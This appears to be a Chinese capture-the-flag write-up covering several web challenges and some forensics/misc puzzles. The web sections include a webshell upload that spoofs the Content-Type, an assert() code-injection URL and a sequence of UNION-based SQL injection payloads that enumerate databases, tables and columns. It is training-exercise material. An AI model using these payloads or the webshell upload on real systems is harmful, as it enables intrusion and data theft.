Web upload
打开题目地址发现是空白
查看源代码看到upload.php
所以把file改成upload.php,发现是个文件上传,且只能上传jpg格式的文件
写php一句话木马
上传时用bp抓包
对比上传正常的jpg文件时的请求,把一句话的文件类型改成image/jpeg
go一下发现上传成功
接着用菜刀连接
得到flag
Web warmup
打开题目地址页面上只有一个haha…查看源代码发现一个index.php
在url中添上index.php得到一段代码
查阅assert函数:检查一个断言是否为 FALSE,如果 传入的值是字符串,它将会被 assert() 当做 PHP 代码来执行。
所以可以令a=highlight_file(‘flag.php’);// 高亮显示flag.php,并注释掉后面的代码(==$b都被注释掉了)
阅读代码,当b!=Hello World!时程序结束并输出haha…所以先传入b的值:1
?b=Hello%20word!&a=highlight_file(%27flag.php%27);//
得到flag
Web where is flag
因为有中英文按钮,发现可以文件上传
用php://filter读取index.php,再用base64解码即可得到flag
Web sql-1
判断回显位
-1’ union select 1,2,3,4 #
爆数据库
-1’ union select database(),2,3,4 #
【或:-1’ union select group_concat(schema_name),2,3,4 from information_schema.schemata #】
爆sql1数据库的数据表
-1’ union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema=’sql1’#
爆 fl4g 表的列
‘ union select group_concat(column_name),2,3,4 from information_schema.columns where table_name=’fl4g’ #
爆出flag
‘ union select *,2,3,4 from fl4g #
Misc dog
下载的压缩包中含有一个flag.jpg和一个打开需要密码的flag.txt,把图片用记事本格式打开查找secret得到打开txt文件需要的密码,打开文件得到flag
Misc real pass
打开压缩包发现需要密码,尝试暴力破解但是提示该文件被损坏或是未加密文件
于是猜想可能是伪加密,用WinHex打开
发现源文件数据区加密区为09 00,改成00 00再打开就不需要密码,于是拿到flag。
Misc hotdog
用WinHex打开发现图片中还隐藏了一个flag.zip,将该图片用360压缩打开,得到
打开flag.zip需要密码,密码由颜文字解密得到,解密网站https://tool.zcmzcm.org/aadecode
输入密码打开flag.txt文件即拿到flag。
Misc zkzkzk
拼图得flag
Misc 格式里的秘密
图片用记事本打开搜索得到flag